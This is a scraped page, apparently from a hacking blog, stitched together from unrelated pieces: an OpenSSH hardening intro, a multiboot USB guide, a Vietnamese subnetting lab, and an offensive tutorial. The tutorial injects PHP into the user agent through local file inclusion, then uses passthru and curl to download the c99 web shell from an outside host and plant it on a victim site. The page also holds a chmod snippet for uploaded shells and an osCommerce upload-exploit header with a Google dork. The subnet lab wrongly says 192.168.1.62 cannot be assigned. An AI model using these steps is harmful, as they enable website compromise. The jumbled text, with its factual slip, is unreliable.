Top 20 OpenSSH Server Best Security Practices

OpenSSH is the implementation of the SSH protocol. OpenSSH is recommended for remote login, making backups, remote file transfer via scp or sftp, and much more. SSH is perfect to keep confidentiality and integrity for data exchanged between two networks and systems. However, the main advantage is server authentication, through the use of public key cryptography. From time to time there are rumors about OpenSSH zero dayexploit. Here are a few things you need to tweak in order to improve OpenSSH server security.

Default Config Files and SSH Port



  • /etc/ssh/sshd_config - OpenSSH server configuration file.

  • /etc/ssh/ssh_config - OpenSSH client configuration file.

  • ~/.ssh/ - Users ssh configuration directory.

  • ~/.ssh/authorized_keys or ~/.ssh/authorized_keys - Lists the public keys (RSA or DSA) that can be used to log into the user’s account

  • /etc/nologin - If this file exists, sshd refuses to let anyone except root log in.

  • /etc/hosts.allow and /etc/hosts.deny : Access controls lists that should be enforced by tcp-wrappers are defined here.

  • SSH default port : TCP 22

[Win Tool] Boot Multiple ISO from USB (MultiBoot USB)

How to create a Multiboot USB Flash Drive that you can use to Boot Multiple ISO Files from USB. Please note that you might need a 8GB-16GB or larger USB flash device to be able to support every bootable ISO entry. I will update and add more Bootable ISO files to the list as I find the time to test them. You can also contact me to submit working Bootable Linux ISO menu.lst entries for inclusion.

MultiSystem - Create a MultiBoot USB from Linux

Custom Multiboot UFD containing your favorite Bootable Live Linux Distributions.

 

Official HomePage: http://liveusb.info/dotclear

Multisystem Prerequisites:


  • Ubuntu Linux or Ubuntu Based System (can use an Ubuntu CD or USB)

  • A USB Flash Drive (to use for your MultiBoot USB)

  • Working Internet Connection

  • install-depot-multiboot.sh.tar.bz2

Cách chia Subnet nhanh

Dạo trước mình có viết bài Subnet mask và cách chia có trình bày về cách chia Subnet căn bản. Cách tính và nhớ phương phá để chia Subnet có nhiều cách, bài này trình bày cách tính rất nhanh, tham khảo nhé. VIA từ blog của Anh Lê Cường.

Tay tráiTay phải


Các bước chia như sau:

Ta có bài LAB như sau:

Ví dụ ta có IP 192.168.1.0 chia 3 mạng con theo yêu cầu của sếp:

B1: Xác định số bit sẽ mượn dựa vào số mạng con muốn chia (quy tắc bàn tay trái):

Công thức tính để chia bao nhiêu mạng con ta làm như sau:

2^n >= m (m là số mạng con cần chia hay còn gọi là số subnet cần chia, n là con số bit ta sẽ mượn)

suy ra ta có: 2^n >=3 (số 3 là số mạng con mà sếp yêu cầu).

suy ra tiếp n là số 2. (Nhìn bàn tay trái đốt thứ 2 của ngón út là số 4, 4 dĩ nhiên lớn hơn 3).

B2: Quy tắc bàn tay phải: Ở đây ta sẽ mượn 2 bit (số n ở trên B1). Dựa theo hình tay phải nó sẽ là số 192.

B3: Tìm bước nhảy (Bước nhảy có nghĩa là 3 mạng con này sẽ nằm từ ip bao nhiêu tới bao nhiêu cho mỗi bước).

Lấy 256 - 192 của B2 (ở đâu có 256? xin thưa 0--> 255 là có 256 host vì vậy ta lấy 256 -192 = 64

==> Ta có các mạng con như sau:

Mạng 1: 192.168.1.0          Netmask: 255.255.255.192


Mạng 2: 192.168.1.64          Netmask: 255.255.255.192


Mạng 3: 192.168.1.128          Netmask: 255.255.255.192


Mạng 4: 192.168.1.192          Netmask: 255.255.255.192


Xong rồi, được 4 lớp mạng nhỏ, tuỳ bạn sử dụng nhé. Test cái bằng cách cài đặt win xp cho 2 cái máy ảo sau đó đặt IP theo 3 trường hợp sau:

TH1:

Máy 1:

192.168.1.70         Netmask: 255.255.255.192


Máy 2:

192.168.1.80         Netmask: 255.255.255.192


Kết quả: Cho 2 máy ping nhau ==> kết quả ping OK. (Reply from 192.168.1.80: bytes=32 time=1ms TTL=128)

TH2:

Máy 1:

192.168.1.70 Netmask: 255.255.255.192

Máy 2:

192.168.1.180 Netmask: 255.255.255.192

Kết quả: Cho 2 máy ping nhau ==> kết quả ping Không được (vì 2 ip này khác mạng).

TH3:

Máy 1:

192.168.1.62 Netmask: 255.255.255.192

Máy 2:

192.168.1.128 Netmask: 255.255.255.192

Kết quả: Máy 1 không đặt được IP và Máy 2 cũng vậy.

Tại sao vậy? cho bạn kết luận nhé.

Kết thúc bài LAB. Sau bài LAB này bạn có công thức tính và chia subnet. Sau đó tiếp tục bạn hãy thử học phương pháp tính nhanh phía dưới nhé.

Subnet mask và cách chia

Subnet là gì?: Hiểu đơn giản vầy. Khi ta chia một Network ra thành nhiều Network nhỏ hơn thì các Network nhỏ này được gọi là Subnet.


Vì sao cần phải chia Subnet mask?

Uploading shell by using LFI

================================
Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs 

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about :config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:


Code:

Preference name                            Status     Type        Value
general.useragent.extra.firefox default string Firefox/3.0.7


Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:

<? include("http://shelladdress.com/c99.txt"); ?>


If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing

Code:

<? include("http://shelladdress.com/c99.txt"); ?>


as useragent,type this:

Code:

<? passthru($_GET['cmd']); ?>


Then load your vuln page like this:

Code:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php


So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:

Code:

http://yourvulnsite.com/c99.php


And that's all...

Enjoy,if I helped you,hit the thanks button...]

 

Code chmod khi shell không chmod được


Code:

<?php
@chmod("index.php", 0755);
?>


Code này chỉ hoạt động tại nơi up load lên
Ví dụ :
Em muốn chmod file index.php tại thư mục ( diễn đàn )
thì mấy anh cứ up code đó tại thư mục diễn đàn rồi rồi run file php đó

 

Commerce Remote File Upload Vulnerability (/admin/categories.php)

# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]

 
2012 upshell | Header Image by Game Wallpapers
Avatar Gamezine Designed by Cheapest Tablet PC
Supported by Phones 4u